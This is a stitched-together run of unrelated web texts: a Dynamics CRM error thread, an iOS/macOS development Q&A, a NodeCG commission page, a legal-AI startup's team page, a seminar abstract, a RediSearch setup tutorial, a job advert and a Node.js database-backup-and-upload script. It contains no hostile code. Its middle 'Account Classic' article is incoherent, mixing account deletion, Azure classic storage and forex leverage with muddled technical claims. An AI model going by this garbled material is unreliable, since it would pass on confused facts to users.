Actually, it happened when I was trying to add a business unit. Once I saved, it showed the error "your access to Microsoft Dynamics 365 has not yet been fully configured", and after that, it has begun to show the error "An error has occurred." I tried the resolution on this page but it doesn't work. I checked with 3 different browsers; Chrome and Firefox show the error mentioned above. The IE login pop-up keeps asking for the password while the password and credentials are correct. Any idea how I can resolve this problem?
I enabled trace and the error is the following:

# CRMVersion: 126.96.36.199
[2020-11-09 21:06:46.363] Process:Microsoft.Crm.Sandbox.WorkerProcess |Organization:00000000-0000-0000-0000-000000000000 |Thread: 14 |Category: Exception |User: 00000000-0000-0000-0000-000000000000 |Level: Error |ReqId: 00000000-0000-0000-0000-000000000000 |ActivityId: 2916573e-2ebf-4db8-86f8-bcbd95c967f5 |
WarmUpMockListener.Execute ilOffset = 0x1A
at WarmUpMockListener.Execute(SandboxCallInfo callInfo, SandboxSdkContext requestContext, String operation, Byte serializedRequest) ilOffset = 0x1A
at ilOffset = 0xFFFFFFFF
at SyncMethodInvoker.Invoke(Object instance, Object inputs, Object& outputs) ilOffset = 0x222
at DispatchOperationRuntime.InvokeBegin(MessageRpc& rpc) ilOffset = 0xC4
at ImmutableDispatchRuntime.ProcessMessage5(MessageRpc& rpc) ilOffset = 0x48
at MessageRpc.Process(Boolean isOperationContextSet) ilOffset = 0x65
at Wrapper.Resume(Boolean& alreadyResumedNoLock) ilOffset = 0x1B
at ThreadBehavior.ResumeProcessing(IResumeMessageRpc resume) ilOffset = 0x8
at ExecutionContext.RunInternal(ExecutionContext executionContext, ContextCallback callback, Object state, Boolean preserveSyncCtx) ilOffset = 0x79
at ExecutionContext.Run(ExecutionContext executionContext, ContextCallback callback, Object state, Boolean preserveSyncCtx) ilOffset = 0x9
at QueueUserWorkItemCallback.System.Threading.IThreadPoolWorkItem.ExecuteWorkItem() ilOffset = 0x35
at ThreadPoolWorkQueue.Dispatch() ilOffset = 0xA4
>Crm Exception: Message: Test, ErrorCode: -2147220970

Are you online or on-premise? Is ADFS enabled? I would also recommend applying the latest cumulative update. You are on a very old version and there have been several bug fixes implemented since. Does a user with the System Administrator role have any issues logging in? Is the issue only with accessing the Dashboards?
Can you access a direct link such as: https://<insert org URL>/tools/AdminSecurity/adminsecurity_area.aspx?pagemode=iframe&sitemappath=Settings%7cSystem_Setting%7cnav_security
ADFS was not enabled. I installed it but nothing changed. I will try to apply a cumulative update and let you know the result.
Yes it does. None of the users can log in. I cannot access any links; the same error is shown.
I updated and the problem is still there!
Sounds like an authentication issue. Check the event log on the CRM server for any errors. Also, you can enable tracing again, reproduce the issue, and then post the entire log here (omitting any personal details). That first log you posted doesn't really show the root cause. Those error codes are usually pretty generic and not useful in diagnosing the issue.
What's a suitable cross-platform methodology for iOS and Mac OS X?
There seem to be lots of answers for cross-platform frameworks for devices (iPhone + Android), and cross-platform frameworks for desktops (Mac + Win + Linux). This is a different question regarding a suitable framework, methodology, template app, tutorial, or just helpful hints, on developing native apps (not just web apps) that are cross-platform portable between a device OS and a desktop OS. I want to write an app that can run on both my iPhone (or iPad) and also be compiled to run natively on Mac OS X (and not just run in the Simulator). I am willing to live with only basic UI elements that are common to both platforms (only 1 window, generic buttons, text fields, etc.) What's the best methodology to build a pair of apps, with the minimum number of #ifdefs and other platform-specific code rewrites, that will run on my iPhone and natively on my MacBook? I have a simple game I'm writing for my iPhone. I'd like to be able to play it on my Mac without firing up the SDK Simulator.
There is no easy way to do this using standard UI controls. AppKit and UIKit are completely different animals. Even the basic UIView and NSView are very different in structure and function. At that level, you won't see anything that could be made cross-platform. However, there are display elements that can be made to work on Mac and iOS with minimal changes. Core Animation CALayers are one such element, in that they are the same on Mac OS X and iOS. This is why we chose to use them as the basis for the Core Plot framework, which uses an almost identical codebase to display graphs on Mac and iOS. There are a few platform-specific things to tweak (like the inverted coordinate system a UIView applies to its backing layer), but most of the code will translate to both platforms. You mention writing a game. If you are using OpenGL ES for this, much of the rendering code you write will also work on the Mac.
There are a few things you will need to alter, but for the most part OpenGL ES is a subset of desktop OpenGL. However, for a simple 2-D game I'd recommend sticking with Core Animation unless you really hit a brick wall, performance-wise, simply because you will write so much less code. The items I've mentioned so far have all been in the View portion of the Model-View-Controller design pattern. Your controller code will be application-specific, but you may be able to make most of that platform-independent. If you use a simple model, or even one that relies on SQLite or Core Data for persistence, that should be trivial to make work on Mac and iOS with the same code. A Mac application and an iOS one (even between the various iOS devices) will have a very different core design. You can't just shoehorn something from one platform into another. Games are probably more portable than anything else, but you will still need to do some custom work to reflect the unique attributes of each computing device. I know the standard UI and NS controls are different. What I would like to know is if anyone has done some sort of abstraction layer for both to allow something that doesn't require as much of a complete rewrite of the UI. The view rendering stuff using Core Graphics requires very little besides a macro for the flipped y axis coordinates. Should be possible to do this between iOS and MacOS with something a lot more lightweight than the stuff used to create, for instance, linux/Windows cross platform apps. One would hope... I'm also struggling with this one; I'm using Unity3D and the free license doesn't allow native OS X plug-ins. I've just spent the last hour reading through http://rayvinly.com/how-to-build-a-truly-universal-framework-for-ios-and-mac-with-just-a-single-codebase/ Ray has done a super presentation, you can download his 30 page ebook document! He also provides a template project. 
I'm thinking I could use this setup to create a single drawing surface (so, a single window on both platforms) which I could draw to using SpriteKit. Then wrap mouse/touch input to create a unified input. As for ready-made frameworks, http://chameleonproject.org/ looks interesting. http://kivy.org/#home looks much more interesting: multiplatform Python wrapping GLES2 Also http://polycode.org/ http://qt-project.org/ What did you choose in the end?
Need something done?
Layouts and Graphics
Want to impress your audience? Amazing graphics are the way to go! Using NodeCG, there are infinite possibilities when it comes to displaying information on screen. In terms of layouts, I can create a basic pack for you, or give me some custom layouts and I'll import them into NodeCG. All layout-based work is compatible with my Speedcontrol Layouts bundle. If you need some custom layouts, like a donation shower or scoreboard, I can do that as well! Give me the specs, and I'll get right to work making your vision become a reality!
Layouts are neat and such, but they become useless if you cannot control them properly. With Restreamer Dashboard, that's not a problem! Easily control OBS from the comfort of your own browser, without having to connect to another PC via TeamViewer. Add a feature to the existing software, or create a whole new system; you pick.
Need someone to host everything? My server is up to the task! Depending on the project, either NodeCG or Node-RED will be used.
Take your event to the next level with custom Discord bots! Post donations in chat every time one comes in (shown here), manage runners and commentators, add some reaction roles; the possibilities are endless!
Depending on the size of your organization and the complexity of your project, my prices usually range from $20 to $200. Yes, it's really that simple. Included in the price are unlimited revisions, all source files, and full support in case you run into problems. Commissioned projects are usually posted to GitHub for others to use, but if you'd rather keep your project private, you're welcome to ask at no extra charge. If you need your project done faster than the regular timeframe, I charge between $10 and $50 extra, depending on my availability and the size/complexity of your project. Payment is done through PayPal, in two steps. Before starting the project, I ask for an upfront deposit amounting to 50% of the final cost.
Once your project is completed to your satisfaction, the remaining balance is paid. If for some reason I cannot complete your project or you are unsatisfied with the result, you are entitled to a refund of your deposit. No refunds will be issued for completed projects already paid in full. Most communication is done through Discord, which is my preferred way of communicating. If Discord's not your thing, I'm also willing to communicate via email. I usually respond within 24 hours of any message. Every couple of days or so, I like to send out a message outlining the current state of your project. If possible, I also provide photos and/or demos of your project. Feel free to reach out at any time to make changes or to discuss possible improvements.
Timeframe and Availability
Depending on the size and complexity of your project, the time between conception and completion is usually a couple of weeks. This includes the actual development, testing, and revisions. If you can't wait that long, I do offer faster development at a premium. The timeframe for that is about a week or two, depending on the size/complexity of your project. In terms of availability, I'm generally available throughout the year. I am currently studying in college, so availability may be limited or nonexistent during periods of high activity, such as school projects or exams. On top of that, I also participate in various marathons during the year, so availability may be limited at those times as well. Keep in mind that school and other marathons are prioritized over commissioned work. I believe that communication is important, so I'll make sure to let you know of any conflicts before starting your project. In the event that I need to delay a project due to an unforeseen circumstance, I'll let you know as soon as possible. All my commission work comes with full support. If you ever run into problems down the road, let me know and I'll fix it, or walk you through the solution.
This also includes an installation walkthrough, bugfixes, and more. If you would like to add additional features to your project after completion, I may or may not ask for a payment depending on the age of the project, the complexity, and my availability. Please reach out to me for more information.
It's time to do your best work with the power of modern AI. Our legal assistant frees you from poring over paper and enables you to focus on the truly strategic aspects for unmatched results. Important information is buried in boilerplate, scattered across thousands of documents, and changing under new versions - yet you are responsible for making the right decision. Let our next-generation document understanding AI handle the tedious, repetitive work and give your team a competitive advantage when tackling complex tasks. Leave behind the limitations of keyword search: our search engine speaks your language! With legal context understanding, formulating research questions has never been more intuitive. Sensitive information can take many forms and can often be revealed by subtle clues that are extremely hard to spot. That’s why our AI does not use a fixed list of things to look for, but instead has learned in which contexts a piece of information is a candidate for redaction.
Here you'll find all the latest media coverage, award announcements, press releases, and more:
Until recently, Paulina Grnarova didn't have much to do with the legal field. Since this spring, the 30-year-old has been occupied with it almost non-stop, ever since she founded DeepJudge in Zurich with three partners. Read more
Paulina Grnarova smiles when the usual clichés come up. Yes, people are surprised when she says she studied Computer Science. Read more
For the 21st year in a row, cantonal and federal authorities together with key players from the private industry are meeting to discuss evolutions in #legaltechnology. Read more
ETH spin-off DeepJudge wins final stage of Venture Kick!
Congratulations and best of success to founders Paulina Grnarova, Kevin Roth, Florian Schmidt, and Yannic Kilcher! Read more
Our CEO, Paulina, gave a keynote on the recent breakthroughs in #AI and showed how they will affect the future of the #legal profession! Read more
Tomorrow we'll be heading out to the AI+X Summit 2021 organized by the ETH AI Center and the ETH Entrepreneur Club. Read more
The sixth edition of the Swiss FinTech Awards is entering its final round. The jury has selected four finalists from ten nominees. In the Early Stage category, for fintech companies... Read more
DeepJudge is the first ETH AI Center spin-off, representing startups who turn their research into products to enter the global arena of AI-first solutions. Our mission stood up to the competition in front of various industry juries, and we are grateful for receiving significant financial support from Venture Kick Stages 1-3, SNF Bridge, and Innobooster by Gebert Rüf Stiftung. Since our incorporation in early 2021, our journey hasn't gone unnoticed, and we are excited to have received various prestigious awards including Forbes 30under30, Digital Shapers, and the Swiss Fintech Awards. Coming straight from the frontier of AI research, our founding team of AI experts redefines the role of legaltech solutions in legal practice. Equipped with four PhDs in AI and 5+ years of experience at big tech companies, we know how to build AI systems that deliver the levels of quality, reliability, and privacy that legal workflows demand.
During her PhD, Paulina saw the AI revolution first-hand at ETH and Google and decided it was time to challenge the status quo in legaltech with her own team of AI experts. While her PhD connected researchers from OpenAI, Google Brain, and ETH Zurich, it's now her mission at DeepJudge to connect the legal world with AI technology.
Kevin is a physicist turned computer scientist with a knack for data and algorithms. Kevin holds a PhD in Machine Learning from ETH Zürich.
He was awarded the ETH Medal in Physics and has worked at Google Brain in Berlin and Microsoft Research in Cambridge, UK.
Yannic is our all-rounder: beyond his experience as a software engineer, his PhD at ETH and work at Google AI Language have put him at the forefront of training, building, and deploying ML models. He is now leading the technical developments at DeepJudge.
Florian has a passion for text data and designs our core document understanding AI. During his PhD at ETH he focused on AI models that generate text and worked with Typewise on the future of predictive keyboards.
Lucas is a machine learning engineer working on large-scale natural language processing. Before joining DeepJudge, he conducted research for Aleph Alpha, a German startup working on Artificial General Intelligence. Outside of work, he's also an active member of HomebrewNLP and MLCommons.
Bilaal holds a Master of Laws and is currently taking the bar exam. Thanks to his diverse experience throughout his legal training, he provides us with input to develop our product and acts as our in-house legal counsel.
With 20 years of digital experience for international companies around the globe, and as a former lead designer at one of the world's largest custom-software and consulting providers, he now contributes to the DeepJudge team.
Dimitri is fascinated by algorithms and programs of all kinds. He's especially interested in the intersection of AI and artistic applications, e.g. artificially generating music. After graduating with a Bachelor's in Computer Science from ETH Zurich, his passion for applications of AI led him to DeepJudge, where he applies the latest AI research to make people's lives just a little bit easier.
Marvin is a software developer currently studying at ETH Zurich, where his interest in AI and its application to natural language has led him to DeepJudge. He is currently working as part of the ML team to do research and help further develop the product.
Jürgen studied computer science and has several years of experience in software engineering and software architecture in different industries (life science, finance, insurance). He is fascinated by combining software engineering with machine learning/AI and building new solutions on that basis. He is currently working on his M.Sc. in Artificial Intelligence. Lukas is a software engineer who is passionate about creating fast and modern products using cutting-edge technology, a mission which is well aligned with his role at DeepJudge. Prior to joining, he studied Computer Science at ETH Zurich, was part of the Code Expert development team and acted as a board member of the student association VIS. Aashna is curious about the world of AI, and sees tremendous potential in using language as a way to connect people and make technology more widely accessible. She is currently starting her Master’s in Electrical Engineering at ETH Zürich, and is supporting DeepJudge part-time in our mission to revolutionise the legal industry!
I've lost count of the number of times something popped up while I'm typing, just as I'm about to press the Enter or ESC keys, leaving me wondering what I just broke or signed up to. In Windows 10, non-critical messages are signaled in the status bar. A flashing icon could be less disruptive than an easily-dismissed dialog. "fans are handed a special pouch that is locked up with their smartphone inside the fan keeps that pouch with them during the event" This is huge news for those of us that suffer from arthritis. No more struggling with those ridiculously thin pencils! Freedom at last! I was lucky enough to find a lightly-used Surface Pro 3 (i7, 8 GB RAM, 256 GB SSD storage) with 2 pens, keyboard (or whatever Microsoft call it) and full-sized dock for less than half price. With a 128 GB micro-SD card, it gives me 4-6 hours of battery to do the 'serious' stuff which, in my case, is photo processing (Lightroom 4, ON1 Photo 10, Photoshop Elements) and music making (Presonus Studio One, Ableton Live 9.5, Komplete 10, etc). Plenty for my needs, and it slips into the skinny laptop compartment of my rucksack with room to spare. (It actually also fits into the map pocket of my gilet, but that's another story). Also in my rucksack is a small, lightweight Bluetooth mouse for when the pen and/or keyboard aren't enough - it doesn't get a lot of use. In my pocket is an 8" Acer Windows tablet which also gives me 4-6 hours of 'consumption', including G+, Twitter, web browsing, maps, train and other transit times, magazine and book reading, etc, etc. It has 32 GB of storage space (plus a 64 GB micro-SD card) and 1 GB of RAM. As it's an 8" device, it runs full Windows 10 desktop.
Out and about, they connect to the net (and so to OneDrive, Dropbox, etc) via my 10 GB per month 4G to WiFi dongle. At home, they're on the same Workgroup as my PC, so I can drag and drop files between them at LAN (the Surface) or WiFi (the Acer) speeds. This combination of two tablets serves my needs very well. Perhaps the OP might consider this solution. If a subordinate asks you a pertinent question, look at him as if he had lost his senses. When he looks down, paraphrase the question back at him.
How to Use Account Classic Account Classic is a program that allows you to manage your users, your storage and your customers. You can also create a new account and delete an existing one. It’s very easy to get started and learn how to use it. Delete an account If you are looking for a quick and easy way to remove yourself from the social networking fraternity, you’ve come to the right place. You can easily delete your account and re-register with a new username. The process takes less than five minutes, and you don’t even have to provide a credit card. To take it one step further, you can also choose to have your account auto-refresh on an ad hoc basis. There is one minor downside to this approach; you won’t be able to reply to any messages you receive. However, you’ll be able to re-post your selected content later on. This option is useful when you want to hide all of your posts and comments, but you’re not in the mood to write anymore. Create a customer account Using a classic customer account has many benefits. These include the correct billing details and the ability to save credit card information. It also enables the customer to see a real-time summary of their order status and if they’ve purchased more than one item, they can even track which items were sent in a package. In the event a shipment is lost, missing or broken, the customer can log into the account and have their order replaced. Creating a customer account is the cheapest way to make a purchase. This is especially true if you are offering a subscription product. There are also tools and services available to help you manage your customer list. Using an account management software tool can help you keep track of your most valuable customers. The best part is you can even set up alerts for when these customers become eligible for discounts or special offers. 
Create a storage account The Azure team has made it possible to create classic storage accounts using the old PowerShell cmdlets. These accounts can be used to host Resource Manager virtual machines. However, this type of account cannot be migrated to a newer type. To create a classic storage account, you will need to use the New-AzureStorageAccount command. This cmdlet will create a storage account that can be assigned to an existing resource group. It also sets the access tier. You can then upload content to the blob storage in the new account. If you need to configure a custom module for the storage account, you will need to use a Runbook to do so. You can also explore the data in the account with the Storage Explorer. Create a trading account If you’re thinking of starting to trade the foreign exchange market, you’ll need to choose the right type of account. There are several types to choose from, depending on your time and money commitment. Mini trading accounts are designed for novice traders. Unlike the standard account, mini trading accounts allow you to open positions with a smaller amount of capital. Besides allowing you to trade with a lower amount of capital, this type of account offers you a variety of advantages. For example, you’ll be able to use leverage up to 400:1. This allows you to earn higher profits in case you manage to make a successful investment. The standard trading account is suitable for beginners, intermediate investors, and professional traders. This type of account enables you to buy and sell stocks and other securities within a single platform. The Classic User Accounts applet is not displayed by default. Instead, it must be manually opened using the control userpasswords2 command. This will allow you to manage users, add users, and edit their information. If you’re a site administrator, you can access the Manage Users menu through the Manage Access > Roles page.
This menu is accompanied by a drop-down list for all of your current user accounts. You can then search for and sort users by email address, username, or by any number of other criteria. You can also use the Manage Users window to edit user information or assign them to a new group. There are two types of users you can work with: those that have an identity domain administrator (IDDAM) account and those that do not.
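As a rough sketch, creating a classic storage account with the legacy Service Management cmdlet mentioned earlier might look like this (the account name, location and replication type are placeholders; this assumes the old, now-retired Azure PowerShell module, not the newer Az module):

```powershell
# Classic (Service Management) storage account -- legacy Azure module, names illustrative
New-AzureStorageAccount -StorageAccountName "mystorageacct" `
                        -Location "West US" `
                        -Type "Standard_LRS"
```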
Time: Tuesday, October 9, 2018, 2:30 - 4:30 pm Speaker: Binzheng Zhang (张彬铮), Assistant Professor, Department of Earth Sciences, The University of Hong Kong It is now over three decades since the first paper was published using the code that has come to be known as LFM (Lyon-Fedder-Mobarry). The code, used since then extensively in heliophysics research, had a number of novel features: eighth-order centered spatial differencing, the Partial Donor Cell Method limiter for shock capturing, a non-orthogonal staggered spherical mesh with constrained transport, conservative averaging-reconstruction for axis singularities and the capability to handle multiple ion species. However, the computational kernel of the LFM code, designed and optimized for architectures long retired, has aged and is difficult to adapt to the modern multicore era of supercomputing. To carry its legacy forward, we re-envisage the LFM as GAMERA, Grid Agnostic MHD for Extended Research Applications, which preserves the core numerical philosophy of LFM while also incorporating numerous algorithmic and computational improvements. The upgrades in the numerical schemes include accurate grid metric calculations using high-order Gaussian quadrature techniques, high-order upwind reconstruction, and non-clipping options for interface values. The improvements in the code implementation include the use of data structures and memory access patterns conducive to aligned, vector operations and the implementation of hybrid parallelism, using MPI and OMP. Thus, while keeping the best elements of LFM, GAMERA is designed to be a portable and easy-to-use code that provides multi-dimensional MHD simulations in non-orthogonal curvilinear geometries on modern supercomputer architectures. The new, efficient and high-quality numerical kernel is currently serving as the backbone of a whole geospace model. Extended applications include the magnetospheres of Jupiter/Saturn and Mercury/Venus, the inner heliosphere, the solar corona and a basic plasma physics simulation box.
Prof. Binzheng Zhang received his B.S. (2005) and M.S. (2007) in Electrical Engineering from Zhejiang University, and his Ph.D. in Engineering Sciences from Dartmouth College in 2012. From 2012 to 2015 he was a research scientist and lecturer at Dartmouth College, and from 2015 to 2017 a postdoctoral researcher at the National Center for Atmospheric Research (NCAR). Since 2018 he has been an Assistant Professor in the Department of Earth Sciences at The University of Hong Kong. Prof. Zhang has made notable contributions to MHD simulation algorithms, large-scale space weather modeling, magnetosphere-ionosphere (M-I) coupling, and planetary physics. He has led several US NSF and NASA research projects, served as co-investigator and key participant on several others, published over 40 SCI papers, and has been repeatedly invited to give oral presentations at international geoscience conferences such as AGU.
Redis is a key-value storage system that can be configured to speed up websites, including those running WordPress and WooCommerce. It is typically used as the fast storage system for the WordPress and WooCommerce external object cache (using, for example, this plugin). But Redis has grown and become more versatile! You can actually build modules for Redis, and one of those is called RediSearch. Thanks to Foad Yousefi, we have a plugin that can leverage RediSearch; it appears to be a fork of ElasticPress, which uses Elasticsearch (installation guide) as the search engine for WordPress and WooCommerce whenever possible. The Redis equivalent plugin of ElasticPress is called RediSearch, just like the module. This tutorial does assume you have already installed Redis server. We will be using Ubuntu 18.04 for this tutorial to build the RediSearch extension and add it to our Redis configuration. You will generally need root or sudo access to accomplish this. You should test this on a staging server first! Getting Started with RediSearch First we need to build the RediSearch extension and afterwards we need to configure the RediSearch WordPress plugin. Build RediSearch Module Extension First let’s update our package repository list and install the build tools and git apt install cmake build-essential git -y Enter your temporary folder, clone the repo, enter it, create a build directory, and generate the build files git clone https://github.com/RedisLabsModules/RediSearch.git cd RediSearch mkdir cmake && cd cmake cmake ..
-DCMAKE_BUILD_TYPE=RelWithDebInfo You should see a lot of output like this -- The C compiler identification is GNU 7.3.0 -- The CXX compiler identification is GNU 7.3.0 -- Check for working C compiler: /usr/bin/cc -- Check for working C compiler: /usr/bin/cc -- works -- Detecting C compiler ABI info -- Detecting C compiler ABI info - done -- Detecting C compile features -- Detecting C compile features - done -- Check for working CXX compiler: /usr/bin/c++ -- Check for working CXX compiler: /usr/bin/c++ -- works -- Detecting CXX compiler ABI info -- Detecting CXX compiler ABI info - done -- Detecting CXX compile features -- Detecting CXX compile features - done -- Performing Test HAVE_W_INCOMPATIBLE_POINTER_TYPES -- Performing Test HAVE_W_INCOMPATIBLE_POINTER_TYPES - Success -- Performing Test HAVE_W_DISCARDS_QUALIFIERS -- Performing Test HAVE_W_DISCARDS_QUALIFIERS - Failed CMake Deprecation Warning at CMakeLists.txt:6 (CMAKE_POLICY): The OLD behavior for policy CMP0026 will be removed from a future version The cmake-policies(7) manual explains that the OLD behaviors of all policies are deprecated and that a policy should be set to OLD only under specific short-term circumstances. Projects should be ported to the NEW behavior and not rely on setting a policy to OLD. CMake Warning (dev) at CMakeLists.txt:113 (GET_TARGET_PROPERTY): Policy CMP0045 is not set: Error on non-existent target in get_target_property. Run "cmake --help-policy CMP0045" for policy details. Use the cmake_policy command to set the policy and suppress this warning. get_target_property() called with non-existent target "example_extension". This warning is for project developers. Use -Wno-dev to suppress it. 
-- Configuring done -- Generating done -- Build files have been written to: /tmp/RediSearch/cmake Now you can build the RediSearch module with this command You will see a long list of output which finishes like this Scanning dependencies of target redisearch [ 91%] Building C object CMakeFiles/redisearch.dir/src/module-init/module-init.c.o [ 92%] Linking C shared library redisearch.so [ 92%] Built target redisearch Scanning dependencies of target sizes [ 92%] Building CXX object CMakeFiles/sizes.dir/src/c_utils/sizes.cpp.o [ 93%] Linking CXX executable sizes [ 93%] Built target sizes Scanning dependencies of target redisearchS [ 93%] Linking C static library libredisearchS.a [ 93%] Built target redisearchS Scanning dependencies of target test_vector [ 94%] Building C object src/rmutil/CMakeFiles/test_vector.dir/test_vector.c.o [ 95%] Linking C executable test_vector [ 95%] Built target test_vector Scanning dependencies of target test_args [ 96%] Building C object src/rmutil/CMakeFiles/test_args.dir/test_args.c.o [ 96%] Linking C executable test_args [ 96%] Built target test_args Scanning dependencies of target test_cmdparse [ 97%] Building C object src/rmutil/CMakeFiles/test_cmdparse.dir/test_cmdparse.c.o [ 97%] Linking C executable test_cmdparse [ 97%] Built target test_cmdparse Scanning dependencies of target test_heap [ 98%] Building C object src/rmutil/CMakeFiles/test_heap.dir/test_heap.c.o [ 98%] Linking C executable test_heap [ 98%] Built target test_heap Scanning dependencies of target test_periodic [ 99%] Building C object src/rmutil/CMakeFiles/test_periodic.dir/test_periodic.c.o [ 99%] Linking C executable test_periodic [ 99%] Built target test_periodic Scanning dependencies of target test_priority_queue [100%] Building C object src/rmutil/CMakeFiles/test_priority_queue.dir/test_priority_queue.c.o [100%] Linking C executable test_priority_queue [100%] Built target test_priority_queue Now there is an extension file called redisearch.so in the Let’s copy 
that somewhere that makes sense: make a Redis modules folder, then copy over the extension file mkdir -p /etc/redis/modules cp /tmp/RediSearch/cmake/redisearch.so /etc/redis/modules/redisearch.so Now reference this module in the redis.conf file by adding this line loadmodule /etc/redis/modules/redisearch.so To do so you can use nano or your favorite Linux text editor sudo nano /etc/redis/redis.conf I added it at the bottom here; you may want to adjust how much RAM is available to Redis as well in the future. # create a unix domain socket to listen on # set permissions for the socket # requirepass passwordtouse # maximum memory allowed for redis # how redis will evict old objects - least recently used Reload Redis server to activate the new configuration with the RediSearch module enabled. sudo service redis-server restart Now it is time to move on to the application side of things and configure the WordPress plugin to work with RediSearch. Configure the RediSearch WordPress Plugin Time to install the RediSearch WordPress plugin. I prefer to do this via WP-CLI wp plugin install redisearch --activate Now we need to add the Redis server settings in the RediSearch plugin. In the wp-admin sidebar find Redisearch and then choose Redis server For the Redis server set 127.0.0.1 or your server address For the Redis port set 6379 or whatever is set in your Redis configuration Give the index a name under Redisearch index name and click Save Now navigate to Redisearch > Indexing options Choose your options here; I recommend checking Write redis data to the disk so that you do not have to re-index if Redis restarts for one reason or another. Remember to click Save changes. Now you can start the indexing process by going to Redisearch > Redisearch Click the icon on the left to begin the indexing from MySQL to Redis. That should take care of it! Verify RediSearch Index Data If you want to verify that your WordPress or WooCommerce data was indexed using RediSearch you can log in to the Redis server via the Redis CLI.
You should then see a prompt showing you are in the redis-cli administration prompt. Then you can type INFO keyspace at the 127.0.0.1:6379> prompt and select the database that shows up. Selecting the Redis database in the CLI is that simple: if the database exists you will get a message showing success. Then you can list all of the keys for that index. When you are done you can exit the redis-cli. I hope you had fun with this 🙂
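As a sketch, the verification steps above look like this from a shell (these commands assume a local Redis on the default port and that the index landed in database 0; use whatever database INFO keyspace actually reports):

```shell
redis-cli INFO keyspace    # shows which databases contain keys
redis-cli -n 0 KEYS '*'    # list all keys in database 0, including the RediSearch index keys
```

The `-n` flag selects the database non-interactively, which is equivalent to running SELECT 0 inside the interactive prompt.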
Sr. Analyst Services Developer Job Description Summary The GOS Global Technology Service group is a team of dedicated IT consultants, project managers and business analysts that supports our client technology solutions through best-in-class software systems, utilizing a service delivery model to deliver value within a clear, consistent and measurable framework. Additionally, we provide assessment, technology roadmap, transition and integration services as well as a continuous improvement-based support model to ensure an ongoing technology investment for the duration of our client relationships. In support of Global Occupier Services, our team also provides business development support including solution definition, pricing, technology demonstration and delivery for Strategy and Portfolio Administration Services, Transaction & Project Management, Facilities (IFM), Space & Occupancy, and Financial Management. We are looking for an experienced Analysis Services/Business Intelligence Developer to help build and improve a global BI platform built primarily on the Microsoft stack in Azure. You will use your design, coding and business analysis skills to create, maintain and enhance data objects and measures in Azure Analysis Services tabular models as part of a structured software development lifecycle. There will also be an element of business analysis and documentation to support the tabular models that make up the semantic layer. Ultimately, you will help develop tabular models and contribute to reporting solutions to ensure company information is presented securely and accurately.
BAU Data Warehouse Support - troubleshoot and fix analysis services issues including sometimes complex business logic implemented in Power Query and/or DAX within our BI solution consolidating data from various applications for internal and external clients Platform Development - create and enhance multiple tabular models as part of planned platform development projects and activities Transition Management - support the technology components of new client on boarding to include such items as building and testing objects and measures in tabular models, etc. Client Project Services - carry out technology project related activities to include such items as requirements capture, business rule specification, tabular model design, change management routines in Azure Analysis Services and Power BI Collateral development - in supporting the DW solutions the role includes activities such as documenting the new implementations and changes in the data model to be able to compile for multiple IT and Business standards Key Performance Indicators: Delivery to deadlines Internal and external client satisfaction Number of requests from others to do things (precise measures to be agreed) Knowledge & Experience: At least 5 years solid Power Query and DAX coding experience with tabular models using SQL Server Analysis Services (including SSAS 2016 or greater) and/or Azure Analysis Services Demonstrable experience as technical lead in the design of tabular models from scratch as part of a semantic layer implementing complex business logic supporting visualizations in Power BI Experience gathering and analyzing business requirements; documenting their technical implementation Experience or knowledge of Power BI as a pure visualization layer using direct query Routine use of source control (Git, SVN, TFS, etc) as part of regular BI development activities. Knowledge of conceptual, logical and physical data modeling, dimensional models, star schemas, etc. 
(although this is not a data modeling role) Proven experience troubleshooting and resolving Analysis Services issues. Debugging, identifying bugs and driving them to closure by working closely with the development team Tabular model performance tuning, partitioning and optimization experience Work closely with a multi-disciplinary team in an Agile / Scrum environment ensuring quality deliverables at the end of each sprint. Good communication skills in creating and maintaining technical documentation Familiarity with test management (UAT, unit testing, system integration testing and release to live processes) Project Management Methodologies Nice to have Tabular model development and deployment accelerators such as BISM Normalizer or Analysis Services Deployment Wizard. Test-driven BI development using NBi, SentryOne Legitest, DbFit or other testing frameworks IT Infrastructure Library (ITIL) Foundations / Software Development Lifecycle Management (SDLC) Involvement with BI community activities or newsgroups Any exposure to Azure LogicApps or PowerApps would also be welcome An understanding of software engineering principles, particularly the database lifecycle management (DLM) process e.g. version-controlled releases; branching & merging; partially or fully automated release builds, continuous integration/delivery, etc. Skills & Personal Qualities: Forward Planning: Plans for business activities; anticipates resource requirements; builds in contingency and flexibility Enabling Delivery: Retains a strong focus on delivering results to high standards despite constraints or setbacks; monitors and controls performance; uses resources effectively to ensure delivery Change Orientation: Responds positively to change and new ideas Building Relationships: Establishes and nurtures harmonious relationships both externally and internally. Project Management Skillset: Ability to manage the needs of clients and organize vendor-related tasks, meet KPIs set by the business.
Cushman & Wakefield provides equal employment opportunity. Discrimination of any type will not be tolerated. Cushman & Wakefield is an Equal Opportunity / Affirmative Action employer. All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, sexual orientation, gender identity, disability, protected veteran status or any other characteristic protected by state, federal, or local law.
const Payload = require('../utils/Payload');
const { upload } = require('../utils/wetransfer_upload');
const dumpDataBase = require('../utils/pgFunctions').dumpDataBase;

const uploadFile = async (params) => {
  sendMsg(params, 'Preparing the file upload');
  const files = [
    new Payload({ filePath: params.filePath })
  ];
  // Return the upload stream so callers can attach further listeners if needed
  return upload('', '', files, `Backup of database ${params.nomeBanco}. By Ninja!`, 'en')
    .on('progress', (progress) => sendMsg(params, `${progress.percent * 100}% - ${progress.size && progress.size.transferred} of ${progress.size && progress.size.total}`))
    .on('end', (end) => sendMsg(params, `Process finished: ${end.shortened_url}`))
    .on('error', (error) => sendMsg(params, error));
};

const backupDataBase = async (params) => {
  /**
   * params.nomeBanco = name of the database to back up
   * params.filePath = path where the backup will be saved
   * params.hasFileNameOnPath = boolean saying whether the file name is already part of the path; if not, the script uses the database name to name the file
   * params.msg = callback used to report the execution status to the user
   */

  // Check that the parameters were provided
  if (!params) {
    throw Error('No parameters given.');
  }
  if (!params.nomeBanco) {
    throw Error('Database name not given.');
  }
  if (!params.filePath) {
    throw Error('The location where the file should be saved was not given.');
  }

  // If the file name is not already part of the path, build one from the database name
  // (the original condition also required the property to be absent, which contradicted the comment above)
  if (!params.hasFileNameOnPath) {
    params.filePath = `${params.filePath}/${params.nomeBanco}.backup`;
  }

  sendMsg(params, 'All set! Starting the procedure!');
  sendMsg(params, 'BACKUP RUNNING!');
  const result_backup = await dumpDataBase(params);
  sendMsg(params, 'BACKUP FINISHED!!!');
  return result_backup;
};

const sendMsg = (params, msg) => {
  params.msg && params.msg(msg);
};

module.exports = { uploadFile, backupDataBase };
